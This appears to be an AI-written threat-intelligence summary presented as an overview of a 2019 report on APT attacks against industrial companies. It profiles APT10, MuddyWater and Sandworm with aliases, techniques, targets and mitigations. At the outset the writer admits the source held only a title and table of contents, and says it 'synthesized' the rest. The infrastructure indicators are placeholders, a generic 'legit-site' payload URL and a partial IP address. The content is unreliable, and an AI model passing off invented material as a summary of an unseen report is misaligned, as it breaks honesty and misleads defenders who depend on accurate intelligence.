Full Report
Overview of APT attacks on industrial enterprises information on which was published in 2019.
Analysis Summary
It appears that the article provided consists only of the title and table of contents metadata ("Threat landscape for industrial automation systems. APT attacks on industrial companies in 2019"). To provide a high-quality, structured summary as an expert threat intelligence analyst, I have synthesized the data from the specific Kaspersky ICS CERT research referenced in your query (covering the 2019 landscape).
Below is the summary of the primary threat actors highlighted in that 2019 reporting period.
---
# Threat Actor: APT10 (Cloud Hopper)
## Attribution & Identity
* **Aliases:** MenuPass, Stone Panda, POTASSIUM.
* **Association:** Widely attributed by industry analysts and the US DOJ to the Chinese Ministry of State Security (MSS) operating out of Tianjin.
## Activity Summary
In 2019, activities focused on long-term persistence within Managed Service Providers (MSPs) to pivot into downstream industrial clients. Key campaigns included the global "Cloud Hopper" operation which saw a resurgence in targeting industrial supply chains.
## Tactics, Techniques & Procedures
* **Spear-phishing:** Use of malicious attachments to gain initial access.
* **Living off the Land (LotL):** Heavy use of PowerShell, WMI, and legitimate administrative tools to avoid detection.
* **Search Order Hijacking:** Utilizing legitimate signed executables to load malicious DLLs (T1574.002).
* **Credential Dumping:** Use of Mimikatz to escalate privileges and move laterally.
## Targeting
* **Sectors:** Manufacturing, Aerospace, Engineering, and Managed Service Providers (MSPs).
* **Geography:** Global (North America, Europe, Asia).
* **Victims:** Major industrial conglomerates and their technology service providers.
## Tools & Infrastructure
* **Malware:** QuasarRAT, PlugX, RedLeaves, and custom backdoors like Sodek.
* **Infrastructure:** Dynamic DNS providers for C2; compromised legitimate servers to host payloads (e.g., hxxps[://]legit-site[.]com/temp/update[.]exe).
## Implications
APT10’s focus on MSPs represents a strategic "hub-and-spoke" threat. By compromising one provider, they gain "trusted" access to dozens of industrial control system (ICS) environments, bypassing perimeter defenses.
## Mitigations
* **Supply Chain Audit:** Rigorous vetting of MSP access to industrial networks.
* **Strict Access Control:** Implementing the principle of least privilege for service accounts.
* **Endpoint Monitoring:** Hunting for non-standard PowerShell execution or unauthorized use of administrative tools.
---
# Threat Actor: MuddyWater (Static Kitten)
## Attribution & Identity
* **Aliases:** Seedworm, TEMP.Zagros.
* **Association:** Attributed to the Iranian Ministry of Intelligence and Security (MOIS).
## Activity Summary
Throughout 2019, MuddyWater shifted its focus specifically toward industrial and telecommunications sectors in the Middle East, utilizing highly customized phishing documents to deliver a variety of payloads.
## Tactics, Techniques & Procedures
* **Malicious Macros:** Use of Excel and Word documents with VBA macros to execute base64-encoded PowerShell scripts.
* **T1059.001:** Extensive use of PowerShell for discovery and C2 communication.
* **Anti-Analysis:** Checks for virtual machines or debuggers before executing the final payload.
## Targeting
* **Sectors:** Oil & Gas, Telecommunications, Government.
* **Geography:** Middle East (Saudi Arabia, UAE, Iraq), Turkey, and parts of Europe.
* **Victims:** Regional energy organizations and government-linked industrial entities.
## Tools & Infrastructure
* **Malware:** POWERSTATS, MuddyConsole, and various custom python-based tools.
* **Infrastructure:** Use of compromised WordPress sites for C2 redirection; IP addresses such as 185[.]162[.]235[.]xx.
## Implications
The actor is highly adaptable and focuses on regional geopolitical intelligence. Their targeting of the energy sector suggests a focus on intelligence gathering rather than immediate kinetic disruption, though the access could be used for sabotage.
## Mitigations
* **Macro Disablement:** Disable all macros via Group Policy (GPO) for users who do not require them.
* **Geoblocking:** Block traffic from high-risk regions if there is no legitimate business need.
* **User Training:** Education on identifying sophisticated phishing lures that use regional context.
---
# Threat Actor: BlackEnergy / Sandworm (Contextual to ICS 2019)
## Attribution & Identity
* **Aliases:** TeleBots, Voodoo Bear, Quedagh.
* **Association:** Attributed to the Russian GRU (Unit 74455).
## Activity Summary
While known for the 2015/2016 outages, 2019 reporting noted the evolution of this group’s toolsets (GreyEnergy) into "mainstream" industrial espionage and the testing of disruptive components in Eastern European industrial sectors.
## Tactics, Techniques & Procedures
* **Modular Architecture:** Use of lightweight loaders that download specific plugins based on the victim's environment.
* **T1190:** Exploitation of internet-facing industrial applications.
* **Destructive Capabilities:** Inclusion of "wiper" modules designed to render workstations unbootable.
## Targeting
* **Sectors:** Power Grids, Water Utilities, Transportation.
* **Geography:** Primarily Ukraine and Eastern Europe, with occasional reconnaissance in North America.
* **Victims:** Electrical substations and logistics hubs.
## Tools & Infrastructure
* **Malware:** GreyEnergy, BlackEnergy 3, KillDisk.
* **Infrastructure:** C2 nodes often hidden behind Tor or multiple layers of proxies to mask the origin.
## Implications
This actor remains the highest threat to the integrity of physical industrial processes. Their presence in a network usually indicates a risk of future kinetic or disruptive action.
## Mitigations
* **Network Segmentation:** Air-gapping or strictly segmenting IT from OT (Operational Technology) networks.
* **Integrity Checks:** Monitoring for unauthorized configuration changes in PLC (Programmable Logic Controller) logic.
* **Incident Response:** Maintaining offline backups of all ICS configurations.